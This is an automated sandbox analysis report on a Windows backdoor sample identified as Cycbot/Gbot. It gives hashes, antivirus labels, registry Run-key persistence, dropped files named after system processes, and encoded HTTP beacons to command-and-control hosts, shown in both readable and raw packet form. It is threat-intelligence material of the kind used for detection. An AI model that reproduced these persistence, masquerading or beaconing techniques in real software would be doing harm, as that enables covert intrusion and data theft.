Analysis Date: 2015-01-17 02:25:40
MD5: 790d2b32b94d385cfa40a4b2a8de28bb
SHA1: 7afd49dc06735eb56982f54429454037dcca3318

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: e1d2f2316917cc8565b9b03c46b45b85 sha1: eefb44eccea353a42022e046d3359ae669aa406b size: 94720
Section .rdata: md5: 90ea1a8f4920e7972810911a0026752a sha1: a567ae9d83ed7821d261d19054e9f2548e26660c size: 1024
Section .data: md5: 227bd5bc15728f95a70bc816d5b9ba59 sha1: c6b77902175293cddd479bf4be50a4ba5a19cbea size: 21504
Section .rsrc: md5: 86bab689a4572d78a73e55925f9e5dcc sha1: 3d0da0424018495f4d4e37529d2949bf4962e305 size: 1024
Timestamp: 2005-09-04 16:12:54
Version: PrivateBuild: 1423
PEhash: 35229193933e462618535c90896022f03827e568
IMPhash: d693cb80d28194347960becacd722e8a
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Heur.Conjar.2
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Gen:Heur.Conjar.2
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Heur.Conjar.2
AV CA (E-Trust Ino): Win32/Cycbot.C!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Agent-216222
AV Dr. Web: Trojan.DownLoader1.43184
AV Emsisoft: Gen:Heur.Conjar.2
AV Eset (nod32): Win32/Kryptik.IVA
AV Fortinet: W32/Krypt.NHL!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.GTC
AV Grisoft (avg): Agent.5.BJ
AV Ikarus: Backdoor.Win32.Gbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Packed.Win32.Krap.hy
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.2
AV Rising: Trojan.Win32.Generic.125FE1F7
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Trojan.Gen
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: zoneck.com
Winsock DNS: 127.0.0.1
Winsock DNS: sharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: zoneck.com
Type: A
208.79.234.132
DNS: sharewareconnection.com
Type: A
216.240.159.81
DNS: xibudific.cn
Type: A
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAo1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://sharewareconnection.com/im/s.cgi?tq=gHZutDyMv5rJeCG1J8K%2B1MWCJbP4lltXIA%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAo1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1032 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1033 ➝ 216.240.159.81:80
Flows TCP: 192.168.1.1:1034 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1035 ➝ 208.79.234.132:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427641 6f312532 426a6277 76675339   fBvAo1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d2f 732e6367 693f7471   GET /im/s.cgi?tq
0x00000010 (00016)   3d67485a 75744479 4d763572 4a654347   =gHZutDyMv5rJeCG
0x00000020 (00032)   314a384b 25324231 4d57434a 6250346c   1J8K%2B1MWCJbP4l
0x00000030 (00048)   6c745849 41253344 25334420 48545450   ltXIA%3D%3D HTTP
0x00000040 (00064)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000050 (00080)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000060 (00096)   68617265 77617265 636f6e6e 65637469   harewareconnecti
0x00000070 (00112)   6f6e2e63 6f6d0d0a 41636365 70743a20   on.com..Accept: 
0x00000080 (00128)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000090 (00144)   2067626f 742f322e 330d0a0d 0a626f74    gbot/2.3....bot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427641 6f312532 426a6277 76675339   fBvAo1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427641 6f312532 426a6277 76675339   fBvAo1%2BjbwvgS9
0x00000040 (00064)   31375836 35724a71 6c4c6667 50695757   17X65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....


Strings
..
040904b0
1423
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
0ZIryy
1M:] {
2Icc%XtC
4(-&Xc
}.5-gX^
5t*\~+
5'X8EX
68K	_q
[!6xoL
+`,7F<
(7,gXH
7kqVvk
	@7SIa
86EXGX
	8DXjZeXhd
8EXGX3
'8l5r7
8}opwq
aZ4DNZ
B;{}'$
B d*9_W
BZ~eyw<
C7-coS
c8HvM3
_c,c}[
cc2c\b
ccfXdX
CloseHandle
c<,M/I3<w'
CreateStdAccessibleObject
CreateThread
=cu',P
cV@S:[8$
@.data
DeleteCriticalSection
DW}LwA
DX9zDX>
DXeXEX
DXGX$X
\DX$Xc
DXX^)oq
EnterCriticalSection
EnumResourceNamesA
e@r%rQy
EX6ZwW
EX/7dX~
_	eXeX
eXfXh3
EXFXHC
EXhhlFre
ExitProcess
EXi/y}>
	EXU_H
eX=[%X
eX$XdX
EX%XZz
FindClose
FindFirstFileW
FreeEnvironmentStringsA
fX9=DXA
/FXJHT
/fXm*};
fXO+>IJ
fXW-IW<
[G\1h\
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
/	g!:V
gX]:,1
^~GXDX)K
[*\gXgX8
gXNi'X
gXwEX? 
GXZ}k	
hhLoad
hhLoca
i5hP,O
IDXuOS
iMgX<nj
InitializeCriticalSection
j%b3Ti
jcu	Kg1SQ
j:dXTk
JdX=xi
JiFX/W
J/$Xv.
=JZGX'X
KERNEL32.dll
Klw{\r
kr*DOYC
KV0EZaa
#LClUD
LeaveCriticalSection
L@h6H~
)l	K]i
LLj%XO
.lnJn`
LoadLibraryA
\lovDX
LresultFromObject
>m7?oK
m/98z]
%mAV8Kh!
,mkGXA
M_MGX<$X
N2,]Iz+8tz
_N_-Bs
nfX|n(<
*nGXDX
^n:&XP
O*c1V;bI%
OgXtGX
OLEACC.dll
OQY;Sn
OTiTgX
[o}=WNl
p3o`zS4'
:>RCd{IA
`.rdata
ReadFile
	R?I}:
rM+'UPKJ
SetEndOfFile
SetFilePointer
TerminateThread
?TGXdX7
!This program cannot be run in DOS mode.
ThLibr
-TNdagF5
U8=DX.
UK.FXgX
[}U/y	
UzEX9tu
VeXWEX
v&;fv%6 
v_hg!8
VH%RD/
v,n|?GX
v[sG-W
;(Vw&X
:+VzO#
woFX/s
WriteFile
><$X)1
'X/471
X4DXfX
X4:(EX
'X5FXo
X5W$X$Xz
X6?7hC
x6J95{
'X:7gXxU
X87i;<
X8K\)I
X9+|&X
XDX4i1
XdX<fX
XDXgX@
XdXGXK
X(DXiYl
XDXJ$X~
XDXoJ]&XN
X>DX_v
X*<EX_
X*eX|I
XEX}N1
$X~EXo
'XEX$Xi
XeX'Xr
XEX$XV
X]|fX~
XfXDX3
XFXfXr
XfXGX4y
XgX<fX~
XGX~J9
%XGXM%X
'XgX)<$XDX
&X)_h3
&X^H_k
X\ik-GXA
XIN~%X
XIvUeXX
XjGX8i(
XJl^,}
XjyYM2
XkGX5K
%XK$Xo
Xl6gX1
XL].$X
X=:[neX
XngX:%XX
'X=NIv
XN,J|r
XO~LZ0
XOnEXC
&XOoTQ
)'X+]r
XU%XgX
X|u'XI)
%XV5dXP
XvN>lV
XV'X},h
XV&X/M.
XwDX^$X
%X)$X5R
X%XdX8WN
X$X<eXFX
Xx:fXc
XXGXDX
X'Xj.Ji
X:$Xk_O
x%XK%Xa
$XXn}m
X?XTeX
X%X?v2
X&XVFXo
XX$X{m?
X+'X%X&XY
X{+y5'X8o
XY%XeX'X
X(<ZfXz'X
YdX?=UP
y^<|h$X\
yjj['X
ym*wFX!
Y&WYOw>
y[%X.z
=YYdIc{
|yZfX\
zjiC0P"^
zZ|DX1